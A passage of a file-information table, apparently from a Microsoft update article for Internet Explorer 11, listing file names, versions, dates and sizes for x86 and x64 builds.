\nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 59,904 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 69,120 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:39| 29,696 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 30,720 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:25| 60,416 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 18:26| 230,912 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:26| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 11:10| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:13| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:02| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.20139| 13-Sep-2021| 22:45| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:05| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nwininet.dll| 11.0.9600.20139| 13-Sep-2021| 20:27| 4,387,840 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 20:16| 47,104 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18666| 16-Apr-2017| 1:51| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:13| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:46| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:47| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20139| 13-Sep-2021| 22:46| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 13:56| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:03| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 75,776 \nieui.dll| 11.0.9600.18895| 1-Jan-2018| 20:44| 476,160 \niedkcs32.dll| 18.0.9600.20045| 4-Jun-2021| 21:34| 333,312 \ninstall.ins| Not versioned| 13-Sep-2021| 19:04| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:20| 616,104 \nieapfltr.dll| 11.0.9600.20139| 13-Sep-2021| 20:19| 710,656 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 128,512 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 20:03| 27,136 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:24| 73,728 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.18895| 1-Jan-2018| 20:55| 489,472 \niedvtool.dll| 11.0.9600.20045| 4-Jun-2021| 22:45| 772,608 \nDiagnosticsHub_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:52| 38,912 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:29| 415,744 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 280,064 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 15-Aug-2014| 15:51| 11,892 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:35| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:36| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 4,096 \nF12.dll.mui| 11.0.9600.17278| 15-Aug-2014| 19:47| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:29| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:29| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:31| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 4,096 \nF12.dll.mui| 11.0.9600.20139| 13-Sep-2021| 22:46| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:39| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 3,584 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:28| 175,104 \nF12Resources.dll| 11.0.9600.18939| 10-Feb-2018| 9:17| 10,948,096 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:27| 256,000 \nF12.dll| 11.0.9600.19963| 12-Feb-2021| 18:17| 1,207,808 \nmsfeeds.dll| 11.0.9600.20139| 13-Sep-2021| 20:40| 696,320 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:53| 1,518 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 16:49| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 4:57| 52,736 \nmsfeedssync.exe| 11.0.9600.17416| 30-Oct-2014| 20:25| 11,264 \nmshta.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 12,800 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 76,800 \nmshtml.dll| 11.0.9600.20139| 13-Sep-2021| 21:34| 20,295,168 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 2:20| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:40| 3,228 \nIEAdvpack.dll| 11.0.9600.17416| 30-Oct-2014| 20:14| 112,128 \nieetwcollector.exe| 11.0.9600.18666| 16-Apr-2017| 0:47| 104,960 \nieetwproxystub.dll| 11.0.9600.17416| 30-Oct-2014| 20:23| 47,616 \nieetwcollectorres.dll| 11.0.9600.16518| 6-Feb-2014| 2:19| 4,096 \nielowutil.exe| 11.0.9600.19404| 9-Jul-2019| 20:06| 221,184 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:45| 310,784 \nIEShims.dll| 11.0.9600.20045| 4-Jun-2021| 21:12| 290,304 \niexpress.exe| 11.0.9600.17416| 30-Oct-2014| 20:27| 152,064 \nwextract.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 137,728 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 17:59| 40,448 \nExtExport.exe| 11.0.9600.17416| 30-Oct-2014| 20:20| 25,600 \nWindows Pop-up Blocked.wav| Not versioned| 23-Sep-2013| 19:58| 85,548 \nWindows Information Bar.wav| Not versioned| 23-Sep-2013| 19:58| 23,308 \nWindows Feed Discovered.wav| Not versioned| 23-Sep-2013| 19:58| 19,884 \nWindows Navigation Start.wav| Not versioned| 23-Sep-2013| 19:58| 11,340 \nbing.ico| Not versioned| 23-Sep-2013| 19:36| 5,430 \nieUnatt.exe| 11.0.9600.17416| 30-Oct-2014| 20:12| 115,712 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 13-Sep-2021| 22:04| 2,956 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 459,776 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 579,584 \nMemoryAnalyzer.dll| 11.0.9600.20045| 4-Jun-2021| 21:48| 1,399,296 \nMshtmlDac.dll| 11.0.9600.19867| 12-Oct-2020| 21:43| 64,000 \nnetworkinspection.dll| 11.0.9600.19846| 23-Sep-2020| 20:28| 1,075,200 \noccache.dll| 11.0.9600.17416| 30-Oct-2014| 19:48| 130,048 \ndesktop.ini| Not versioned| 18-Jun-2013| 5:18| 65 \nwebcheck.dll| 11.0.9600.19963| 12-Feb-2021| 18:13| 230,400 \ndesktop.ini| Not versioned| 18-Jun-2013| 5:19| 65 \npdm.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 442,992 \nmsdbg2.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 315,008 \npdmproxy100.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 99,984 \nmsrating.dll| 11.0.9600.19507| 5-Oct-2019| 19:57| 168,960 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:25| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:26| 1,988 \niertutil.dll| 11.0.9600.20064| 14-Jun-2021| 21:16| 2,308,608 \nie4uinit.exe| 11.0.9600.19963| 12-Feb-2021| 18:11| 692,224 \niernonce.dll| 11.0.9600.17416| 30-Oct-2014| 20:15| 30,720 \niesetup.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 62,464 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:55| 16,303 \ninseng.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 91,136 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 90,624 \nTimeline.dll| 11.0.9600.19963| 12-Feb-2021| 18:23| 154,112 \nTimeline_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:40| 124,928 \nTimeline.cpu.xml| Not versioned| 24-Jul-2014| 12:11| 3,197 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 818,176 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 235,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,066,432 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:39| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.20139| 13-Sep-2021| 22:45| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,060,288 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieframe.dll| 11.0.9600.20139| 13-Sep-2021| 20:47| 13,882,880 \nieframe.ptxml| Not versioned| 5-Feb-2014| 21:40| 24,486 \nieinstal.exe| 11.0.9600.18921| 9-Feb-2018| 21:35| 475,648 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:30| 526,294 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 499,654 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 552,337 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 944,559 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:38| 457,561 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 543,946 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 526,557 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 575,838 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:30| 570,737 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 548,119 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 639,271 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 525,504 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 488,488 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 548,494 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 559,343 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 535,067 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 541,455 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 804,470 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 503,909 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 521,583 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 420,082 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:28| 436,651 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:28| 436,651 \ninetres.admx| Not versioned| 11-Jan-2021| 19:25| 1,678,023 \ninetcomm.dll| 6.3.9600.20139| 13-Sep-2021| 20:44| 880,640 \nINETRES.dll| 6.3.9600.16384| 21-Aug-2013| 21:14| 84,480 \njscript9.dll| 11.0.9600.20139| 13-Sep-2021| 20:50| 4,119,040 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 18:37| 620,032 \njscript.dll| 5.8.9600.20139| 13-Sep-2021| 21:01| 653,824 \nvbscript.dll| 5.8.9600.20139| 13-Sep-2021| 21:10| 498,176 \n \n## \n\n__\n\nInternet Explorer 11 on all supported x64-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nactxprxy.dll| 6.3.9600.20045| 4-Jun-2021| 21:30| 2,882,048 \nhlink.dll| 6.3.9600.20120| 11-Sep-2021| 19:47| 109,568 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 19:18| 65,024 \nurlmon.dll| 11.0.9600.20139| 13-Sep-2021| 20:45| 1,562,624 \niexplore.exe| 11.0.9600.19036| 24-May-2018| 23:30| 817,296 \nWininetPlugin.dll| 6.3.9600.17416| 30-Oct-2014| 21:51| 43,008 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:35| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 16:01| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:59| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:20| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 16:00| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:59| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:58| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 16:02| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:57| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:57| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:37| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:37| 52,736 \nwininet.dll.mui| 11.0.9600.20139| 13-Sep-2021| 23:15| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:37| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 31,232 \nhtml.iec| 2019.0.0.20045| 4-Jun-2021| 22:23| 417,280 \ninetcpl.cpl| 11.0.9600.20045| 4-Jun-2021| 21:42| 2,132,992 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 307,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 293,888 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 290,304 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:17| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:18| 299,008 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 303,104 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:33| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 283,648 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 291,840 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:18| 299,520 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 275,968 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 293,376 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:26| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:26| 258,048 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 256,512 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 288,256 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 285,184 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:26| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 297,472 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:13| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 290,816 \nmshtml.dll.mui| 11.0.9600.20139| 13-Sep-2021| 23:17| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:13| 286,208 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:06| 281,600 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:04| 286,720 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:04| 292,352 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:04| 242,176 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 243,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:17| 243,200 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 73,728 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:00| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 78,848 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 61,440 